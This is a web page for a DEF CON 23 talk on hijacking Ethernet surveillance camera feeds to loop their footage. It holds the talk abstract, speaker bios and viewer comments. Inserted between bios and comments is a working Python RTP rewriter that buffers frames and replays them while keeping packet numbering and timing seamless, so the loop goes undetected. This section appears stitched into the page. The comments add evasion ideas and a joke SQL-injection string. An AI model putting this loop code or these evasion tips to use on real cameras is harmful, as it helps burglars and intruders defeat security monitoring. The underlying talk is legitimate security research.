DEF CON 23 - Van Albert and Banks - Looping Surveillance Cameras through Live Editing
- added 24 Dec 2015
- This project consists of the hardware and software necessary to hijack wired network communications. The hardware allows an attacker to splice into live network cabling without ever breaking the physical connection. This allows the traffic on the line to be passively tapped and examined. Once the attacker has gained enough knowledge about the data being sent, the device switches to an active tap topology, where data in both directions can be modified on the fly. Through our custom implementation of the network stack, we can accurately mimic the two devices across almost all OSI layers.
We have developed several applications for this technology. Most notable is the editing of live video streams to produce a “camera loop,” that is, hijacking the feed from an Ethernet surveillance camera so that the same footage repeats over and over again. More advanced video transformations can be applied if necessary. This attack can be executed and activated with practically no interruption in service, and when deactivated, is completely transparent.
Speaker Bios:
Eric is a recent MIT graduate who spends his days building 3D printers for Formlabs and his nights crawling around places he probably shouldn’t. He has taught seminars on lockpicking and physical security vulnerabilities to various audiences at the Institute, and done a small bit of security consulting work. When he runs out of projects to hack on, he reads the leaked NSA ANT catalog for ideas.
Zach is also a recent MIT graduate with over 0 years of security experience. He’s particularly interested in the security of embedded devices and knots. In his free time, he enjoys putting household appliances on the internet and refactoring his old code. - Science & Technology
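The description above says the device first taps the line passively, then switches to an active topology and edits the live video so the same footage repeats, with no visible interruption when the loop is switched on or off. As an added example (not code from the talk or from the ervanalb/lens repository), here is a Python sketch of the recorder-facing half of such a rewriter for an RTP video stream: it buffers a window of whole frames, then substitutes them for the live packets while keeping sequence numbers and timestamps continuous, which is what keeps the receiver from noticing the switch in either direction. Assumptions, all mine: the camera streams RTP over UDP with one marker bit per frame; the demo stream is constructed (payload type 26, JPEG, two packets per frame, 30 fps on the 90 kHz clock); RTCP in both directions, packet loss while looping, and choosing a window that starts on an independently decodable frame are left out.

```python
import struct

RTP_FIXED = struct.Struct("!BBHII")  # V/P/X/CC, M/PT, sequence, timestamp, SSRC (RFC 3550 fixed header)


def rtp_fields(pkt: bytes):
    """Return (marker, sequence, timestamp) from the fixed RTP header."""
    b0, b1, seq, ts, _ssrc = RTP_FIXED.unpack_from(pkt)
    if b0 >> 6 != 2:
        raise ValueError("not an RTP v2 packet")
    return bool(b1 & 0x80), seq, ts


def with_seq_ts(pkt: bytes, seq: int, ts: int) -> bytes:
    """Copy of pkt with only sequence/timestamp rewritten; SSRC, CSRCs, extension and payload untouched."""
    return pkt[:2] + struct.pack("!HI", seq & 0xFFFF, ts & 0xFFFFFFFF) + pkt[8:]


class CameraLoop:
    """Camera-to-recorder direction of an active tap on one RTP video stream (assumed design).

    States: 'pass' forwards live packets, 'record' forwards them and buffers whole
    frames, 'loop' swaps each live packet for the next buffered one. Sequence
    numbers and timestamps of everything emitted continue from the last emitted
    packet, so the receiver sees a monotonic stream whether the loop is off, on,
    or being switched. State changes are applied only after a marker (end of
    frame) packet has been emitted, so no frame is cut in half.
    """

    def __init__(self, frames_to_record: int):
        self.frames_to_record = frames_to_record
        self.state = "pass"
        self.pending = None
        self.buf = []            # (pkt, marker, timestamp delta to the previous buffered packet)
        self.frames_buffered = 0
        self.idx = 0
        self.last_live = None    # (seq, ts) of the last live packet seen
        self.last_out = None     # (seq, ts) of the last packet emitted

    def start_recording(self):
        self.pending = "record"

    def activate(self):
        if self.frames_buffered < self.frames_to_record:
            raise RuntimeError("loop window not fully recorded")
        self.pending = "loop"

    def deactivate(self):
        self.pending = "pass"

    def process(self, pkt: bytes) -> bytes:
        """Take one live packet from the camera, return the packet to send to the recorder."""
        marker, seq, ts = rtp_fields(pkt)
        if self.last_live is None:
            self.last_live = self.last_out = (seq, ts)
        dseq = (seq - self.last_live[0]) & 0xFFFF        # preserve live gaps while passing through
        dts = (ts - self.last_live[1]) & 0xFFFFFFFF
        self.last_live = (seq, ts)

        if self.state == "loop":
            src, marker, dts = self.buf[self.idx]          # replay buffered frame data with its own timing
            self.idx = (self.idx + 1) % len(self.buf)
            dseq = 1                                       # one replayed packet per live packet
        else:
            src = pkt
            if self.state == "record":
                self.buf.append((pkt, marker, dts))
                if marker:
                    self.frames_buffered += 1
                    if self.frames_buffered == self.frames_to_record:
                        self.state = "pass"                # window complete, ready for activate()

        out_seq = (self.last_out[0] + dseq) & 0xFFFF
        out_ts = (self.last_out[1] + dts) & 0xFFFFFFFF
        self.last_out = (out_seq, out_ts)

        if marker and self.pending:                        # switch state only on a frame boundary
            self.state, self.pending, self.idx = self.pending, None, 0
        return with_seq_ts(src, out_seq, out_ts)


def make_rtp(seq, ts, marker, payload, pt=26, ssrc=0x0BADCAFE):
    """Build a constructed RTP packet (V=2, no CSRC or extension); PT 26 is JPEG."""
    return RTP_FIXED.pack(0x80, (0x80 if marker else 0) | pt, seq, ts, ssrc) + payload


def demo(frames=10, frames_to_record=2):
    """Constructed 30 fps camera stream, two packets per frame; returns (payload, seq, ts) per emitted packet."""
    loop = CameraLoop(frames_to_record)
    out = []
    for k in range(frames):
        if k == 0:
            loop.start_recording()        # takes effect after frame 0, so the window is frames 1..2
        if k == 3:
            loop.activate()               # takes effect after frame 3
        if k == frames - 2:
            loop.deactivate()             # takes effect after the next replayed frame ends
        ts = 90000 + 3000 * k
        for part, last in (("A", False), ("B", True)):
            live = make_rtp(100 + 2 * k + (part == "B"), ts, last, b"F%d%s" % (k, part.encode()))
            sent = loop.process(live)
            _m, s, t = rtp_fields(sent)
            out.append((sent[12:].decode(), s, t))
    return out


if __name__ == "__main__":
    for payload, seq, ts in demo():
        print(f"seq={seq} ts={ts} payload={payload}")
```

Running it shows frames 4 to 8 on the wire replaced by frames 1, 2, 1, 2, 1 while the sequence numbers stay 100..119 and the timestamps stay exactly where the live stream put them, which is the property that makes switching the loop off again invisible; a real tap would also have to rewrite the RTCP sender reports going the same way and the receiver reports coming back.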
"Zach is also a recent MIT graduate with over 0 years of security experience." laughed my ass off
"Everyone who cheered is a fed" that was the most I laughed at anyone's defcon intro ever.
This is now one of my top DEF CON talks. THANKS!
Yes it was amazing!
Thanks guys!
Very good talk!
i love the description "Zach is also a recent MIT graduate with over 0 years of security experience"
look at all that experience
These guys may not be the best speakers, and while at a high level this seems pretty self-explanatory, they went all out and really committed to doing it properly; one of the best talks I've seen. I'm happy they explained the lower levels without just showing how "cool" it is like some other talks do.
10:03 His statement about them being invisible to cable analyzers. It depends. The generic $100 ones you'll see many self-employed contractors use wouldn't see a difference. The test kits we lug around on a cart at work get fussy if we untwist the wires before terminating them. So it's likely they'd throw an error of some sort.
But most cables are only certified and tested when they are installed, or if the devices they are connected to are having issues. So it's unlikely that a system like this would be discovered unless it caused a significant drop in performance.
That's what I was thinking with oscilloscopes. 50 MHz might not spot it but a 1 GHz one would see the cable moving when they touched it.
I agree with the conclusion unless it starts saying "you are being haxed lol, gg" with a cartoon dog dancing around the vault, which by the way I would love to see played out in a movie with a guard trying to figure out what's going on.
I don't think it was mentioned (Or I might have missed it during the talk), but the twisting itself is also extremely important, and untwisting them too much can cause degradation in the signal. You can tell a good network engineer and a wiremonkey using punchdown by how long the leads are before they twist up. It's a good idea to untwist as LITTLE as possible. Also, same thing with those who crimp their own cables, try to untwist as little as possible. It not only works better, it looks professional :)
I learned that up to 1.5 cm (13/25 of an inch) is the max to go without problems.
Yeah, they covered that in the talk.
Ahhh yes, thanks to common-mode rejection, any interference introduced on one single wire also gets introduced on the other wire in a twisted pair. Then the interference gets canceled out. This only works if they are twisted due to the fact that if the interference is allowed into only one single wire and not the other in the twisted pair, it gets accepted as a valid signal.
Excellent work, I really like the Python stack for hacking the various protocol layers. Nice!
Forget looping, time to play Mission Impossible level video games now
This was an amazing topic to cover, and I think that they covered it very well! However, I do not support bagging on Riley from National Treasure, that was what sparked my interest in technology as a kid.
Brilliant guys! Enjoyed the talk.
*Public Butt
*Private Butt
*Hybrid Butt
*???
*Profit!
why does the con logo get more screen space than the actual presenters? wtf
its a scam
Because they can't really change the aspect ratio of the video, so, with the way they arranged the two streams, there is inevitably going to be a bunch of wasted screen real estate, which they decided to use for the logo.
With access to two segments far enough apart I'm sure one could passively resolve individual bit streams from each end of a gigabit Ethernet link with reasonable effectiveness.
Incredible
fantastic demo, love the giggling like a school girl!
Amazing stuff.
I never thought it was possible to connect to Ethernet without disturbing the connection :D
It isn't, not Gig-E anyway. You can (passively) tap 100 Mbit Ethernet (see Great Scott's "Throwing Star LAN Tap"), but the point of this is to modify the data, not just sniff it. What their board is doing is the fancy equivalent of quickly unplugging a network cable then reconnecting it to a dual-port NIC that is passing/modifying the packets. If you do it quickly it's pretty unlikely that anyone would notice. You're right to some degree: they point out in the Q+A that it's possible to optimize the renegotiation of the intercepting NICs so that there's no obvious up/down transition on the PHYs of the network being patched.
Wildcard L2 forward ports or force VLAN ports on the switch. Granted the switch has to support it, but it would do this pretty easily. No PoE outage, link log entries, or wire cuts. Isn't software just grand.
incredible
the "cloud to butt" technique is awesome
The Advantages of Public Butt
best opening ever
What's next, they're gonna get Robert ')DROP TABLE Students;-- to present?
Little Bobby Tables we call him
this is epic
Awesome
These guys are great...don't get me wrong....but, this reminds me of early Beavis and Butthead episodes. "Hey Beavis....yeah?... I totally changed their website to butt...huh..hee hee...ugh huh hee...TP my bunghole!"
10/10
good shit
With MITM on HDMI you should be able to fake HDCP authentication and forward the decrypted stream elsewhere. Could just use multiple cables tho :/
It would be good to somehow connect 8, or at least 4, of the punch connector tools so you can make multiple connections at once.
Someone: What Do You Do?
Me: I Do Shit.
love this shit
Is there a device that can do this without splicing the wires, even if the connection is broken for a few seconds? (e.g. taking the Cat 5e and plugging it into the device while it's connected into the system)
NSA like ''hold my beer''
cool shit ;)
good
Almost like Beavis and Butthead, but for entertainment; sheer brilliance.
the vault looks like it's probably a ch751 anyway :P
Couldn't the signal be passively tapped (relative to the cable) with some opamps and a small battery? I'd think a simple voltage follower/unity-gain amp could feed off the lines and reproduce the signal with nearly zero current loss.
(ed: nm I'm guessing that's what's being done with the usb supply.)
Hmmm, nice idea; the only problem I could think of is the capacitance of the lines... but they took it to the next level with the live editing of the live stream.
A passive tap isn't very useful is it - the point is to intercept and modify the video, not just copy it.
Dr Tune I'd consider a passive tap useful. Being able to confirm viewing angles of camera feeds, occupation of rooms and movement of staff, etc.
But how do we know they didn't live edit the camera showing the video feed to look like they looped the feed, but didn't?
[CLAP] lol love it ! !
Hak5 now has man in the middle for HDMI.
hmm. Easy low level safety against this would be a clock on top of that safe that can't be manipulated and would be easy to detect if looped. Cool show still.
.... or just Gigabit infrastructure as he stated at the beginning... If you have a business which has a safe which is being monitored by camera on a 10[0]baseT network...
They basically covered that with the timestamp thing. Just merge that part of the stream.
@22:00
I was laughing along.
cool shit
Guy asking question: "...ninth degree."
...you mean n'th degree?? lol.
a ninth degree of most things is also a lot
Freudian slip
Throw in a GSM SIM for a remote connection.
23:09 and what about RTMP :D
You can run it on the new Pi lol, it's 64-bit now.
Most security guards don't give a shit what happens; you won't even need that. Most of the videos are very small and they don't even look at them. It is just when something happens that they have to spend a lot of time rerunning the video to see what happened, and by that time the bad guys are long gone.
[00:00] Introducer does a good 'Trump' imitation before that became popular...
[07:39] couldn't you tap in two places and combine differentially for direction...
[12:29] "without ever interrupting"-but it is interrupting impedance-matching...
gradual-transition might be done with a ferrite clamp and 'smart' terminators...
[30:45] You could try Trojan-joke-ware to make it look like the camera fell off its mount and is dangling-about on its cable-distracting viewers a few seconds....
Anyone else think of payday ?
Jean-Jacques Chirac Guys, the thermal drill, go get it.
The only other evidence is the punched/spliced wires :)
which won't have to be inspected if nothing breaks up
Solution: Lots of thermite
Steven Haussmann go the route of "badboys 2" and when you're out the building, blow up the tap device.
I think the wires are the least of a bank's problem if this were to happen to them.
I'd tap that
2 people got caught trying to rob a bank without this method.
Vigil players when they use erc-7
Guys, has anyone seen Bain? I have an idea to tell him.
Cool concept.... But man that delivery....
Cool Down Down Date & Time For A Minute
BEEF!!
If Anyone is looking to buy one of these tap boards "PCB Board Only" I've purchased 20 of them to get into programming. Just be aware that the project can get quite pricey. The Boards are cheap to produce, but some of the components to complete a working board can cost around 190 bucks all together. I'm selling the boards for 15 bucks each with shipping included. I bought them in bulk before I knew how much all the components to complete the board cost. If you'd like a picture of the boards I have just shoot me a message.
If you download REV 3 from their GitHub, from there you should see the BOM. That is a list of all the components. All you have to do is import the BOM into Digi-Key. All the components cost around 212 USD.
github.com/ervanalb/lens/blob/master/hardware/release/bom.txt
It's all in there; the expensive part is the relays, all other parts are cheap.
Claudia Hampton do you have any additional boards available for purchase?
Do you have any pcbs? I would be willing to buy one or two off you and pay for shipping.
Can't you use cheaper relays?
kid in black laughs like a dweeb
I haven't seen anyone use that insult in a long time... But it is true. x)
it's called a nerdgasm
Cute girl though
_inhales_ heee
'tism laughing.
Anyone hear that girly mouse laugh lol!!!
That's a lot of shit lol haha
A brilliant presentation despite the ANNOYING PERSON GIGGLING IN HIS MIC.
Amazing work anyway !
intro from king cringe
he said a lot of cool shit
The easier solution is not to tap the ethernet traffic, but the video feed. Duplicate what goes into the glass lenses, and then feed that into the circuit directly. That's the same as the "low tech" that they said was "too easy"...Gotta love it when people pride themselves in making things harder and more risky than required.
brandon day the video feed IS the Ethernet traffic.
Am I the only one that gets annoyed by people with speech patterns like the guy in orange?
They've DEFINITELY never seen any decent cable diag machine. I've practiced with one this year in school and a tiny 1500€ monster knows every fucking twist in the cable in a 30 km radius. They're monsters for detecting any change in the cable. The RTP & video part was boring af.